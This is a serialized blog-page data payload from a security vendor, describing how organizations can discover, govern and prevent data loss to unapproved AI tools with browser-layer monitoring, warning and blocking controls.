alternatives.",{"data":4445,"content":4449,"nodeType":971},{"target":4446},{"sys":4447},{"id":4448,"type":976,"linkType":977},"17nT8JDTyHLExwhb2upb6T",[],{"data":4451,"content":4452,"nodeType":879},{},[4453],{"data":4454,"marks":4455,"value":4456,"nodeType":883},{},[],"The employee isn't blocked — they're guided toward the governed path at the moment they're about to step off it. This is more effective than a policy document because it arrives right when they need the reminder. ",{"data":4458,"content":4462,"nodeType":971},{"target":4459},{"sys":4460},{"id":4461,"type":976,"linkType":977},"2lDFCuc48jcGODcwD6nYhK",[],{"data":4464,"content":4465,"nodeType":879},{},[4466,4471],{"data":4467,"marks":4468,"value":4470,"nodeType":883},{},[4469],{"type":916},"Block",{"data":4472,"marks":4473,"value":4474,"nodeType":883},{},[]," mode prevents access entirely — Push presents a blocking banner to users who attempt to log in to unapproved apps. ",{"data":4476,"content":4477,"nodeType":879},{},[4478],{"data":4479,"marks":4480,"value":4481,"nodeType":883},{},[],"Push makes the Monitor → Acknowledge → Block progression practical through automatic app categorization. This means that new AI tools inherit whatever governance mode the team has set for that category, without manual blocklist updates. All controls are configurable per user group — the data science team can use AI coding assistants while uploads from finance are restricted — because different teams have different risk profiles.",{"data":4483,"content":4487,"nodeType":971},{"target":4484},{"sys":4485},{"id":4486,"type":976,"linkType":977},"5EBOHy6X6iJfmzJ65txGOv",[],{"data":4489,"content":4493,"nodeType":971},{"target":4490},{"sys":4491},{"id":4492,"type":976,"linkType":977},"31JnX2KNCAnlaVS9Qqqh8W",[],{"data":4495,"content":4496,"nodeType":905},{},[],{"data":4498,"content":4499,"nodeType":909},{},[4500],{"data":4501,"marks":4502,"value":4504,"nodeType":883},{},[4503],{"type":916},"Guardrails: how to prevent data loss to AI tools",{"data":4506,"content":4507,"nodeType":879},{},[4508],{"data":4509,"marks":4510,"value":4511,"nodeType":883},{},[],"Even on the paved path, you need guardrails because preventing data loss to AI tools is a separate problem from controlling which tools employees use. An employee on an approved AI tool can still paste an AWS access key into a prompt, upload a customer spreadsheet, or share confidential documents in a conversation.",{"data":4513,"content":4514,"nodeType":879},{},[4515,4518,4526],{"data":4516,"marks":4517,"value":21,"nodeType":883},{},[],{"data":4519,"content":4520,"nodeType":940},{"uri":3995},[4521],{"data":4522,"marks":4523,"value":4525,"nodeType":883},{},[4524],{"type":948},"Okta's data",{"data":4527,"marks":4528,"value":4529,"nodeType":883},{},[]," on what employees actually share shows what’s at stake: 54% share internal messages and emails with AI tools, 39% share confidential company documents, and 28% share banking and payment information.",{"data":4531,"content":4532,"nodeType":879},{},[4533],{"data":4534,"marks":4535,"value":4536,"nodeType":883},{},[],"Blocking is too much of a blunt instrument here, as obviously, you want employees to be able to use approved tools. The answer is controlling what data enters them.",{"data":4538,"content":4539,"nodeType":1036},{},[4540],{"data":4541,"marks":4542,"value":4544,"nodeType":883},{},[4543],{"type":916},"Browser-layer controls for AI data leakage",{"data":4546,"content":4547,"nodeType":879},{},[4548],{"data":4549,"marks":4550,"value":4551,"nodeType":883},{},[],"Push addresses this problem with four browser-layer data controls, each targeting a distinct exfiltration path and supporting the same Monitor → Warn → Block enforcement modes:",{"data":4553,"content":4554,"nodeType":879},{},[4555,4560],{"data":4556,"marks":4557,"value":4559,"nodeType":883},{},[4558],{"type":916},"Clipboard blocking",{"data":4561,"marks":4562,"value":4563,"nodeType":883},{},[]," addresses the most common path for sensitive data into AI tools: copy-paste. Push matches clipboard content against preconfigured patterns for AWS access keys, GitHub tokens, API keys, credit card numbers, and personal identifiers, plus custom content rules for organization-specific data like internal project codes. ",{"data":4565,"content":4566,"nodeType":879},{},[4567,4571,4576],{"data":4568,"marks":4569,"value":4570,"nodeType":883},{},[],"In ",{"data":4572,"marks":4573,"value":4575,"nodeType":883},{},[4574],{"type":916},"Warn",{"data":4577,"marks":4578,"value":4579,"nodeType":883},{},[]," mode, Push offers a redacted version of the sensitive data so the employee can continue their work — getting help with their code, for instance — without exposing the actual credential.",{"data":4581,"content":4585,"nodeType":971},{"target":4582},{"sys":4583},{"id":4584,"type":976,"linkType":977},"1JarUdbe8AkJlgB0LjchNR",[],{"data":4587,"content":4588,"nodeType":879},{},[4589,4594],{"data":4590,"marks":4591,"value":4593,"nodeType":883},{},[4592],{"type":916},"File upload blocking",{"data":4595,"marks":4596,"value":4597,"nodeType":883},{},[]," prevents files from being uploaded to specific AI apps, configurable by app, user group, and file type (Push provides a list for fast configuration).",{"data":4599,"content":4600,"nodeType":879},{},[4601,4606,4610,4619,4623,4627],{"data":4602,"marks":4603,"value":4605,"nodeType":883},{},[4604],{"type":916},"File download blocking",{"data":4607,"marks":4608,"value":4609,"nodeType":883},{},[]," addresses a different common risk: Employees downloading desktop versions of AI tools, which moves usage outside the browser where Push has visibility. Download blocking also covers files generated inside web applications, such as an AI tool that produces a downloadable asset. (Push’s detection and response capabilities also protect against scenarios in which attackers present users with ",{"data":4611,"content":4613,"nodeType":940},{"uri":4612},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fllmshare-malvertising-campaign",[4614],{"data":4615,"marks":4616,"value":4618,"nodeType":883},{},[4617],{"type":948},"faked AI tool download pages",{"data":4620,"marks":4621,"value":4622,"nodeType":883},{},[]," as part of phishing campaigns, a technique we dubbed ",{"data":4624,"marks":4625,"value":1838,"nodeType":883},{},[4626],{"type":916},{"data":4628,"marks":4629,"value":4630,"nodeType":883},{},[],".)",{"data":4632,"content":4633,"nodeType":879},{},[4634],{"data":4635,"marks":4636,"value":4637,"nodeType":883},{},[],"Push also provides telemetry streams on all file upload and download events in your environment, so you can get a baseline pattern of life and identify anomalies that could indicate insider risk. ",{"data":4639,"content":4640,"nodeType":879},{},[4641,4645,4650],{"data":4642,"marks":4643,"value":4644,"nodeType":883},{},[],"The Push platform also provides the capability to write your own ",{"data":4646,"marks":4647,"value":4649,"nodeType":883},{},[4648],{"type":916},"custom detections",{"data":4651,"marks":4652,"value":4653,"nodeType":883},{},[],", which you can use for other organization-specific use cases, or even to extend your control over GenAI tool usage, such as by blocking unapproved MCP server connections.",{"data":4655,"content":4659,"nodeType":971},{"target":4656},{"sys":4657},{"id":4658,"type":976,"linkType":977},"5XYVgJjgUPUfY1W1Zcgrvm",[],{"data":4661,"content":4662,"nodeType":879},{},[4663,4667,4672],{"data":4664,"marks":4665,"value":4666,"nodeType":883},{},[],"Finally, ",{"data":4668,"marks":4669,"value":4671,"nodeType":883},{},[4670],{"type":916},"AI conversation visibility",{"data":4673,"marks":4674,"value":4675,"nodeType":883},{},[]," gives you a window into what is being shared in AI chats, consumable as a stream of events to your SIEM or SOAR. Over time, you can build up a picture of what’s normal or what violates company policy, and create a queryable history to identify potential data loss during an incident response process.",{"data":4677,"content":4681,"nodeType":971},{"target":4678},{"sys":4679},{"id":4680,"type":976,"linkType":977},"3ELxGNAa8YaVQR96IuWifj",[],{"data":4683,"content":4684,"nodeType":879},{},[4685],{"data":4686,"marks":4687,"value":4688,"nodeType":883},{},[],"Traditional DLP at the endpoint or network layer misses these paths. Network DLP and SWGs can't inspect clipboard pastes into AI prompts — there's no network event to intercept. Endpoint DLP sees file-system operations but not in-browser activity. ",{"data":4690,"content":4691,"nodeType":879},{},[4692],{"data":4693,"marks":4694,"value":4695,"nodeType":883},{},[],"Push's controls operate where the data is flowing — inside the browser session.",{"data":4697,"content":4698,"nodeType":905},{},[],{"data":4700,"content":4701,"nodeType":1036},{},[4702],{"data":4703,"marks":4704,"value":4706,"nodeType":883},{},[4705],{"type":916},"How to keep up with AI tool sprawl",{"data":4708,"content":4709,"nodeType":879},{},[4710],{"data":4711,"marks":4712,"value":4713,"nodeType":883},{},[],"Pragmatically, the hardest part of generative AI security isn't the initial steps you take — it's keeping up with the sprawl. Point-in-time audits quickly become outdated when the landscape changes so quickly.",{"data":4715,"content":4716,"nodeType":879},{},[4717],{"data":4718,"marks":4719,"value":4720,"nodeType":883},{},[],"Push addresses this with continuous discovery, telemetry streams for the most important points of user interaction with AI apps, and controls that allow you to adapt quickly with simple configuration changes.",{"data":4722,"content":4723,"nodeType":879},{},[4724],{"data":4725,"marks":4726,"value":4727,"nodeType":883},{},[],"With automatic app categorization, if an employee starts using a new AI code assistant that didn't exist last quarter, Push discovers it, classifies it, and applies your governance rules — no manual intervention required.",{"data":4729,"content":4730,"nodeType":879},{},[4731],{"data":4732,"marks":4733,"value":4734,"nodeType":883},{},[],"All AI-related telemetry — app logins, file uploads and downloads, clipboard events, browser extensions, AI chat transcripts — can be sent as structured data to your SIEM.",{"data":4736,"content":4737,"nodeType":879},{},[4738],{"data":4739,"marks":4740,"value":4741,"nodeType":883},{},[],"This gives you all the information you need to track your progress, check your compliance status, and identify trends in AI usage and risk across your business as you make progress toward your goal, armed with the right data you didn't have before.",{"data":4743,"content":4744,"nodeType":879},{},[4745],{"data":4746,"marks":4747,"value":4748,"nodeType":883},{},[],"The goal isn't perfect control over every AI interaction. It's having enough visibility to make informed decisions and enough control to enforce them, without intensifying the shadow AI usage problem you set out to solve. Push can help you get there.",{"data":4750,"content":4751,"nodeType":905},{},[],{"data":4753,"content":4754,"nodeType":879},{},[4755],{"data":4756,"marks":4757,"value":1729,"nodeType":883},{},[],{"data":4759,"content":4760,"nodeType":879},{},[4761],{"data":4762,"marks":4763,"value":1736,"nodeType":883},{},[],{"data":4765,"content":4766,"nodeType":879},{},[4767,4770,4778],{"data":4768,"marks":4769,"value":21,"nodeType":883},{},[],{"data":4771,"content":4773,"nodeType":940},{"uri":4772},"https:\u002F\u002Fpushsecurity.com\u002Fdemo",[4774],{"data":4775,"marks":4776,"value":3260,"nodeType":883},{},[4777],{"type":948},{"data":4779,"marks":4780,"value":21,"nodeType":883},{},[],"Shadow AI: how to discover, govern, and secure AI apps","Blocking AI tools doesn't stop employees from using AI — it stops you seeing how they use it. The solution: make the governed path easier than the workaround.","2026-08-13T00:00:00.000Z","shadow-ai-how-to-discover-govern-and-secure-ai-apps",{"items":4786},[4787,4791],{"sys":4788,"name":4790},{"id":4789},"3SA5H01UkKauuiTdt0KC6q","Shadow IT",{"sys":4792,"name":547},{"id":4793},"7ohk9lIkxMvJMwnp2Lhuad",{"items":4795},[4796],{"fullName":4797,"firstName":4798,"jobTitle":4799,"profilePicture":4800},"Kelly Davenport","Kelly","Product Team",{"url":4801},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F1hi8bEuVfn5sF57LivAq6d\u002F9a3b82426c697d765e2e450e33a18424\u002Fkelly_profile_pic.jpeg","6-browser-based-attacks-every-security-team-should-be-prepared-for","blog\u002F6-browser-based-attacks-every-security-team-should-be-prepared-for",{"json":4805},{"data":4806,"content":4807,"nodeType":875},{},[4808],{"data":4809,"content":4810,"nodeType":879},{},[4811],{"data":4812,"marks":4813,"value":4814,"nodeType":883},{},[],"What security teams need to know about the browser-based attack techniques that are the leading cause of breaches today.","What security teams need to know about the browser-based attack techniques that are the leading cause of breaches.",{"id":4817,"publishedAt":4818},"62Zyr35VUmijkpupWk3hoD","2026-09-15T14:21:54.663Z",{"items":4820},[4821,4823],{"sys":4822,"name":3273},{"id":3272},{"sys":4824,"name":343},{"id":3276},{"items":4826},[4827,4829,4831,4833,4835,4837,4839,4841,4843,4845,4847,4849,4851,4853,4855,4857,4859,4861,4863,4865,4867,4869,4871],{"sys":4828,"name":280,"slug":281,"tier":31},{"id":277},{"sys":4830,"name":415,"slug":416,"tier":31},{"id":412},{"sys":4832,"name":298,"slug":299,"tier":31},{"id":295},{"sys":4834,"name":521,"slug":522,"tier":31},{"id":518},{"sys":4836,"name":343,"slug":344,"tier":31},{"id":340},{"sys":4838,"name":641,"slug":642,"tier":31},{"id":638},{"sys":4840,"name":262,"slug":263,"tier":45},{"id":259},{"sys":4842,"name":316,"slug":317,"tier":45},{"id":313},{"sys":4844,"name":573,"slug":574,"tier":45},{"id":570},{"sys":4846,"name":325,"slug":326,"tier":45},{"id":322},{"sys":4848,"name":468,"slug":469,"tier":45},{"id":465},{"sys":4850,"name":486,"slug":487,"tier":45},{"id":483},{"sys":4852,"name":289,"slug":290,"tier":45},{"id":286},{"sys":4854,"name":450,"slug":451,"tier":45},{"id":447},{"sys":4856,"name":334,"slug":335,"tier":45},{"id":331},{"sys":4858,"name":397,"slug":398,"tier":45},{"id":394},{"sys":4860,"name":424,"slug":425,"tier":45},{"id":421},{"sys":4862,"name":477,"slug":478,"tier":45},{"id":474},{"sys":4864,"name":361,"slug":362,"tier":45},{"id":358},{"sys":4866,"name":607,"slug":608,"tier":45},{"id":604},{"sys":4868,"name":512,"slug":513,"tier":45},{"id":509},{"sys":4870,"name":503,"slug":504,"tier":45},{"id":500},{"sys":4872,"name":459,"slug":460,"tier":45},{"id":456},"CWHqAlpZ3bxfql6wnpiKAuTO9SYOAnCAIx2cGTVmOuM",{"id":4875,"title":3264,"authorsCollection":4876,"content":4881,"extension":228,"faqItemsCollection":6015,"faqTitle":59,"featured":6,"hashTags":59,"meta":6017,"metaTitle":6018,"ogImage":59,"postType":1962,"publishedDate":3266,"relatedBlogPostsCollection":6019,"slug":3267,"stem":7979,"subtitle":59,"summary":7980,"synopsis":3265,"sys":7990,"tagsCollection":7992,"topicsCollection":7998,"__hash__":8050},"blog\u002Fblog\u002Fbrowser-threat-landscape-mid-year-update-2026.json",{"items":4877},[4878],{"fullName":866,"firstName":867,"jobTitle":868,"socialLinks":4879,"profilePicture":4880},[870],{"url":872},{"json":4882,"links":5929},{"data":4883,"content":4884,"nodeType":875},{},[4885,4891,4894,4901,4925,4932,4937,4961,5048,5081,5088,5130,5154,5159,5162,5169,5175,5182,5197,5239,5244,5250,5265,5270,5276,5281,5287,5292,5298,5303,5310,5343,5367,5382,5406,5413,5437,5461,5485,5492,5498,5513,5555,5579,5586,5601,5634,5637,5644,5650,5656,5671,5676,5682,5776,5809,5816,5831,5837,5840,5847,5853,5892,5898,5901,5907,5913],{"data":4886,"content":4887,"nodeType":879},{},[4888],{"data":4889,"marks":4890,"value":1980,"nodeType":883},{},[],{"data":4892,"content":4893,"nodeType":905},{},[],{"data":4895,"content":4896,"nodeType":909},{},[4897],{"data":4898,"marks":4899,"value":1991,"nodeType":883},{},[4900],{"type":916},{"data":4902,"content":4903,"nodeType":879},{},[4904,4907,4913,4916,4922],{"data":4905,"marks":4906,"value":1998,"nodeType":883},{},[],{"data":4908,"content":4909,"nodeType":940},{"uri":2001},[4910],{"data":4911,"marks":4912,"value":2006,"nodeType":883},{},[],{"data":4914,"marks":4915,"value":2010,"nodeType":883},{},[],{"data":4917,"content":4918,"nodeType":940},{"uri":960},[4919],{"data":4920,"marks":4921,"value":2017,"nodeType":883},{},[],{"data":4923,"marks":4924,"value":2021,"nodeType":883},{},[],{"data":4926,"content":4927,"nodeType":879},{},[4928],{"data":4929,"marks":4930,"value":2029,"nodeType":883},{},[4931],{"type":916},{"data":4933,"content":4936,"nodeType":971},{"target":4934},{"sys":4935},{"id":2034,"type":976,"linkType":977},[],{"data":4938,"content":4939,"nodeType":879},{},[4940,4943,4949,4952,4958],{"data":4941,"marks":4942,"value":2042,"nodeType":883},{},[],{"data":4944,"content":4945,"nodeType":940},{"uri":2045},[4946],{"data":4947,"marks":4948,"value":2050,"nodeType":883},{},[],{"data":4950,"marks":4951,"value":2054,"nodeType":883},{},[],{"data":4953,"content":4954,"nodeType":940},{"uri":2057},[4955],{"data":4956,"marks":4957,"value":2062,"nodeType":883},{},[],{"data":4959,"marks":4960,"value":2066,"nodeType":883},{},[],{"data":4962,"content":4963,"nodeType":879},{},[4964,4967,4973,4976,4982,4985,4991,4994,5000,5003,5009,5012,5018,5021,5027,5030,5036,5039,5045],{"data":4965,"marks":4966,"value":2073,"nodeType":883},{},[],{"data":4968,"content":4969,"nodeType":940},{"uri":2076},[4970],{"data":4971,"marks":4972,"value":2081,"nodeType":883},{},[],{"data":4974,"marks":4975,"value":2085,"nodeType":883},{},[],{"data":4977,"content":4978,"nodeType":940},{"uri":2088},[4979],{"data":4980,"marks":4981,"value":2093,"nodeType":883},{},[],{"data":4983,"marks":4984,"value":2097,"nodeType":883},{},[],{"data":4986,"content":4987,"nodeType":940},{"uri":2100},[4988],{"data":4989,"marks":4990,"value":2105,"nodeType":883},{},[],{"data":4992,"marks":4993,"value":2109,"nodeType":883},{},[],{"data":4995,"content":4996,"nodeType":940},{"uri":2112},[4997],{"data":4998,"marks":4999,"value":2117,"nodeType":883},{},[],{"data":5001,"marks":5002,"value":2121,"nodeType":883},{},[],{"data":5004,"content":5005,"nodeType":940},{"uri":2124},[5006],{"data":5007,"marks":5008,"value":2129,"nodeType":883},{},[],{"data":5010,"marks":5011,"value":2133,"nodeType":883},{},[],{"data":5013,"content":5014,"nodeType":940},{"uri":2136},[5015],{"data":5016,"marks":5017,"value":2141,"nodeType":883},{},[],{"data":5019,"marks":5020,"value":2145,"nodeType":883},{},[],{"data":5022,"content":5023,"nodeType":940},{"uri":2148},[5024],{"data":5025,"marks":5026,"value":2153,"nodeType":883},{},[],{"data":5028,"marks":5029,"value":2157,"nodeType":883},{},[],{"data":5031,"content":5032,"nodeType":940},{"uri":2160},[5033],{"data":5034,"marks":5035,"value":2165,"nodeType":883},{},[],{"data":5037,"marks":5038,"value":2169,"nodeType":883},{},[],{"data":5040,"content":5041,"nodeType":940},{"uri":2172},[5042],{"data":5043,"marks":5044,"value":2177,"nodeType":883},{},[],{"data":5046,"marks":5047,"value":2181,"nodeType":883},{},[],{"data":5049,"content":5050,"nodeType":879},{},[5051,5054,5060,5063,5069,5072,5078],{"data":5052,"marks":5053,"value":2188,"nodeType":883},{},[],{"data":5055,"content":5056,"nodeType":940},{"uri":1298},[5057],{"data":5058,"marks":5059,"value":2195,"nodeType":883},{},[],{"data":5061,"marks":5062,"value":2199,"nodeType":883},{},[],{"data":5064,"content":5065,"nodeType":940},{"uri":2202},[5066],{"data":5067,"marks":5068,"value":2207,"nodeType":883},{},[],{"data":5070,"marks":5071,"value":2211,"nodeType":883},{},[],{"data":5073,"content":5074,"nodeType":940},{"uri":2214},[5075],{"data":5076,"marks":5077,"value":2219,"nodeType":883},{},[],{"data":5079,"marks":5080,"value":1350,"nodeType":883},{},[],{"data":5082,"content":5083,"nodeType":1036},{},[5084],{"data":5085,"marks":5086,"value":2230,"nodeType":883},{},[5087],{"type":916},{"data":5089,"content":5090,"nodeType":879},{},[5091,5094,5100,5103,5109,5112,5118,5121,5127],{"data":5092,"marks":5093,"value":2237,"nodeType":883},{},[],{"data":5095,"content":5096,"nodeType":940},{"uri":2240},[5097],{"data":5098,"marks":5099,"value":2245,"nodeType":883},{},[],{"data":5101,"marks":5102,"value":2249,"nodeType":883},{},[],{"data":5104,"content":5105,"nodeType":940},{"uri":2252},[5106],{"data":5107,"marks":5108,"value":2257,"nodeType":883},{},[],{"data":5110,"marks":5111,"value":2261,"nodeType":883},{},[],{"data":5113,"content":5114,"nodeType":940},{"uri":2264},[5115],{"data":5116,"marks":5117,"value":2269,"nodeType":883},{},[],{"data":5119,"marks":5120,"value":2273,"nodeType":883},{},[],{"data":5122,"content":5123,"nodeType":940},{"uri":2276},[5124],{"data":5125,"marks":5126,"value":2281,"nodeType":883},{},[],{"data":5128,"marks":5129,"value":2285,"nodeType":883},{},[],{"data":5131,"content":5132,"nodeType":879},{},[5133,5136,5142,5145,5151],{"data":5134,"marks":5135,"value":2292,"nodeType":883},{},[],{"data":5137,"content":5138,"nodeType":940},{"uri":2295},[5139],{"data":5140,"marks":5141,"value":2300,"nodeType":883},{},[],{"data":5143,"marks":5144,"value":2304,"nodeType":883},{},[],{"data":5146,"content":5147,"nodeType":940},{"uri":2307},[5148],{"data":5149,"marks":5150,"value":2312,"nodeType":883},{},[],{"data":5152,"marks":5153,"value":2316,"nodeType":883},{},[],{"data":5155,"content":5158,"nodeType":971},{"target":5156},{"sys":5157},{"id":2321,"type":976,"linkType":977},[],{"data":5160,"content":5161,"nodeType":905},{},[],{"data":5163,"content":5164,"nodeType":909},{},[5165],{"data":5166,"marks":5167,"value":2333,"nodeType":883},{},[5168],{"type":916},{"data":5170,"content":5171,"nodeType":879},{},[5172],{"data":5173,"marks":5174,"value":2340,"nodeType":883},{},[],{"data":5176,"content":5177,"nodeType":1036},{},[5178],{"data":5179,"marks":5180,"value":2348,"nodeType":883},{},[5181],{"type":916},{"data":5183,"content":5184,"nodeType":879},{},[5185,5188,5194],{"data":5186,"marks":5187,"value":2355,"nodeType":883},{},[],{"data":5189,"content":5190,"nodeType":940},{"uri":1298},[5191],{"data":5192,"marks":5193,"value":2195,"nodeType":883},{},[],{"data":5195,"marks":5196,"value":2365,"nodeType":883},{},[],{"data":5198,"content":5199,"nodeType":879},{},[5200,5203,5209,5212,5218,5221,5227,5230,5236],{"data":5201,"marks":5202,"value":2372,"nodeType":883},{},[],{"data":5204,"content":5205,"nodeType":940},{"uri":2375},[5206],{"data":5207,"marks":5208,"value":2380,"nodeType":883},{},[],{"data":5210,"marks":5211,"value":2384,"nodeType":883},{},[],{"data":5213,"content":5214,"nodeType":940},{"uri":2387},[5215],{"data":5216,"marks":5217,"value":2392,"nodeType":883},{},[],{"data":5219,"marks":5220,"value":2396,"nodeType":883},{},[],{"data":5222,"content":5223,"nodeType":940},{"uri":2399},[5224],{"data":5225,"marks":5226,"value":2404,"nodeType":883},{},[],{"data":5228,"marks":5229,"value":2408,"nodeType":883},{},[],{"data":5231,"content":5232,"nodeType":940},{"uri":2411},[5233],{"data":5234,"marks":5235,"value":2416,"nodeType":883},{},[],{"data":5237,"marks":5238,"value":2420,"nodeType":883},{},[],{"data":5240,"content":5243,"nodeType":971},{"target":5241},{"sys":5242},{"id":2425,"type":976,"linkType":977},[],{"data":5245,"content":5246,"nodeType":879},{},[5247],{"data":5248,"marks":5249,"value":2433,"nodeType":883},{},[],{"data":5251,"content":5252,"nodeType":879},{},[5253,5256,5262],{"data":5254,"marks":5255,"value":2440,"nodeType":883},{},[],{"data":5257,"content":5258,"nodeType":940},{"uri":2443},[5259],{"data":5260,"marks":5261,"value":2448,"nodeType":883},{},[],{"data":5263,"marks":5264,"value":2452,"nodeType":883},{},[],{"data":5266,"content":5269,"nodeType":971},{"target":5267},{"sys":5268},{"id":2457,"type":976,"linkType":977},[],{"data":5271,"content":5272,"nodeType":879},{},[5273],{"data":5274,"marks":5275,"value":2465,"nodeType":883},{},[],{"data":5277,"content":5280,"nodeType":971},{"target":5278},{"sys":5279},{"id":2470,"type":976,"linkType":977},[],{"data":5282,"content":5283,"nodeType":879},{},[5284],{"data":5285,"marks":5286,"value":2478,"nodeType":883},{},[],{"data":5288,"content":5291,"nodeType":971},{"target":5289},{"sys":5290},{"id":2483,"type":976,"linkType":977},[],{"data":5293,"content":5294,"nodeType":879},{},[5295],{"data":5296,"marks":5297,"value":2491,"nodeType":883},{},[],{"data":5299,"content":5302,"nodeType":971},{"target":5300},{"sys":5301},{"id":2496,"type":976,"linkType":977},[],{"data":5304,"content":5305,"nodeType":1036},{},[5306],{"data":5307,"marks":5308,"value":2505,"nodeType":883},{},[5309],{"type":916},{"data":5311,"content":5312,"nodeType":879},{},[5313,5316,5322,5325,5331,5334,5340],{"data":5314,"marks":5315,"value":2512,"nodeType":883},{},[],{"data":5317,"content":5318,"nodeType":940},{"uri":2515},[5319],{"data":5320,"marks":5321,"value":2520,"nodeType":883},{},[],{"data":5323,"marks":5324,"value":2524,"nodeType":883},{},[],{"data":5326,"content":5327,"nodeType":940},{"uri":2527},[5328],{"data":5329,"marks":5330,"value":2532,"nodeType":883},{},[],{"data":5332,"marks":5333,"value":2536,"nodeType":883},{},[],{"data":5335,"content":5336,"nodeType":940},{"uri":2539},[5337],{"data":5338,"marks":5339,"value":2544,"nodeType":883},{},[],{"data":5341,"marks":5342,"value":2548,"nodeType":883},{},[],{"data":5344,"content":5345,"nodeType":879},{},[5346,5349,5355,5358,5364],{"data":5347,"marks":5348,"value":2555,"nodeType":883},{},[],{"data":5350,"content":5351,"nodeType":940},{"uri":2558},[5352],{"data":5353,"marks":5354,"value":2563,"nodeType":883},{},[],{"data":5356,"marks":5357,"value":2567,"nodeType":883},{},[],{"data":5359,"content":5360,"nodeType":940},{"uri":2570},[5361],{"data":5362,"marks":5363,"value":2575,"nodeType":883},{},[],{"data":5365,"marks":5366,"value":2579,"nodeType":883},{},[],{"data":5368,"content":5369,"nodeType":879},{},[5370,5373,5379],{"data":5371,"marks":5372,"value":2586,"nodeType":883},{},[],{"data":5374,"content":5375,"nodeType":940},{"uri":2589},[5376],{"data":5377,"marks":5378,"value":2594,"nodeType":883},{},[],{"data":5380,"marks":5381,"value":2598,"nodeType":883},{},[],{"data":5383,"content":5384,"nodeType":879},{},[5385,5388,5394,5397,5403],{"data":5386,"marks":5387,"value":2605,"nodeType":883},{},[],{"data":5389,"content":5390,"nodeType":940},{"uri":2608},[5391],{"data":5392,"marks":5393,"value":2613,"nodeType":883},{},[],{"data":5395,"marks":5396,"value":2617,"nodeType":883},{},[],{"data":5398,"content":5399,"nodeType":940},{"uri":2620},[5400],{"data":5401,"marks":5402,"value":2625,"nodeType":883},{},[],{"data":5404,"marks":5405,"value":2629,"nodeType":883},{},[],{"data":5407,"content":5408,"nodeType":1036},{},[5409],{"data":5410,"marks":5411,"value":2637,"nodeType":883},{},[5412],{"type":916},{"data":5414,"content":5415,"nodeType":879},{},[5416,5419,5425,5428,5434],{"data":5417,"marks":5418,"value":2644,"nodeType":883},{},[],{"data":5420,"content":5421,"nodeType":940},{"uri":2647},[5422],{"data":5423,"marks":5424,"value":2652,"nodeType":883},{},[],{"data":5426,"marks":5427,"value":2656,"nodeType":883},{},[],{"data":5429,"content":5430,"nodeType":940},{"uri":2659},[5431],{"data":5432,"marks":5433,"value":2664,"nodeType":883},{},[],{"data":5435,"marks":5436,"value":2668,"nodeType":883},{},[],{"data":5438,"content":5439,"nodeType":879},{},[5440,5443,5449,5452,5458],{"data":5441,"marks":5442,"value":2675,"nodeType":883},{},[],{"data":5444,"content":5445,"nodeType":940},{"uri":2678},[5446],{"data":5447,"marks":5448,"value":2683,"nodeType":883},{},[],{"data":5450,"marks":5451,"value":2687,"nodeType":883},{},[],{"data":5453,"content":5454,"nodeType":940},{"uri":2690},[5455],{"data":5456,"marks":5457,"value":2695,"nodeType":883},{},[],{"data":5459,"marks":5460,"value":2699,"nodeType":883},{},[],{"data":5462,"content":5463,"nodeType":879},{},[5464,5467,5473,5476,5482],{"data":5465,"marks":5466,"value":2706,"nodeType":883},{},[],{"data":5468,"content":5469,"nodeType":940},{"uri":2709},[5470],{"data":5471,"marks":5472,"value":2714,"nodeType":883},{},[],{"data":5474,"marks":5475,"value":2718,"nodeType":883},{},[],{"data":5477,"content":5478,"nodeType":940},{"uri":2721},[5479],{"data":5480,"marks":5481,"value":2726,"nodeType":883},{},[],{"data":5483,"marks":5484,"value":2730,"nodeType":883},{},[],{"data":5486,"content":5487,"nodeType":1036},{},[5488],{"data":5489,"marks":5490,"value":2738,"nodeType":883},{},[5491],{"type":916},{"data":5493,"content":5494,"nodeType":879},{},[5495],{"data":5496,"marks":5497,"value":2745,"nodeType":883},{},[],{"data":5499,"content":5500,"nodeType":879},{},[5501,5504,5510],{"data":5502,"marks":5503,"value":2752,"nodeType":883},{},[],{"data":5505,"content":5506,"nodeType":940},{"uri":2755},[5507],{"data":5508,"marks":5509,"value":2760,"nodeType":883},{},[],{"data":5511,"marks":5512,"value":2764,"nodeType":883},{},[],{"data":5514,"content":5515,"nodeType":879},{},[5516,5519,5525,5528,5534,5537,5543,5546,5552],{"data":5517,"marks":5518,"value":2771,"nodeType":883},{},[],{"data":5520,"content":5521,"nodeType":940},{"uri":2774},[5522],{"data":5523,"marks":5524,"value":2779,"nodeType":883},{},[],{"data":5526,"marks":5527,"value":2783,"nodeType":883},{},[],{"data":5529,"content":5530,"nodeType":940},{"uri":2786},[5531],{"data":5532,"marks":5533,"value":2791,"nodeType":883},{},[],{"data":5535,"marks":5536,"value":2795,"nodeType":883},{},[],{"data":5538,"content":5539,"nodeType":940},{"uri":2798},[5540],{"data":5541,"marks":5542,"value":2803,"nodeType":883},{},[],{"data":5544,"marks":5545,"value":2807,"nodeType":883},{},[],{"data":5547,"content":5548,"nodeType":940},{"uri":2810},[5549],{"data":5550,"marks":5551,"value":2815,"nodeType":883},{},[],{"data":5553,"marks":5554,"value":1350,"nodeType":883},{},[],{"data":5556,"content":5557,"nodeType":879},{},[5558,5561,5567,5570,5576],{"data":5559,"marks":5560,"value":2825,"nodeType":883},{},[],{"data":5562,"content":5563,"nodeType":940},{"uri":2828},[5564],{"data":5565,"marks":5566,"value":2833,"nodeType":883},{},[],{"data":5568,"marks":5569,"value":2837,"nodeType":883},{},[],{"data":5571,"content":5572,"nodeType":940},{"uri":2840},[5573],{"data":5574,"marks":5575,"value":2845,"nodeType":883},{},[],{"data":5577,"marks":5578,"value":2849,"nodeType":883},{},[],{"data":5580,"content":5581,"nodeType":1036},{},[5582],{"data":5583,"marks":5584,"value":2857,"nodeType":883},{},[5585],{"type":916},{"data":5587,"content":5588,"nodeType":879},{},[5589,5592,5598],{"data":5590,"marks":5591,"value":2864,"nodeType":883},{},[],{"data":5593,"content":5594,"nodeType":940},{"uri":2202},[5595],{"data":5596,"marks":5597,"value":2871,"nodeType":883},{},[],{"data":5599,"marks":5600,"value":2875,"nodeType":883},{},[],{"data":5602,"content":5603,"nodeType":879},{},[5604,5607,5613,5616,5622,5625,5631],{"data":5605,"marks":5606,"value":2882,"nodeType":883},{},[],{"data":5608,"content":5609,"nodeType":940},{"uri":2885},[5610],{"data":5611,"marks":5612,"value":2890,"nodeType":883},{},[],{"data":5614,"marks":5615,"value":2894,"nodeType":883},{},[],{"data":5617,"content":5618,"nodeType":940},{"uri":28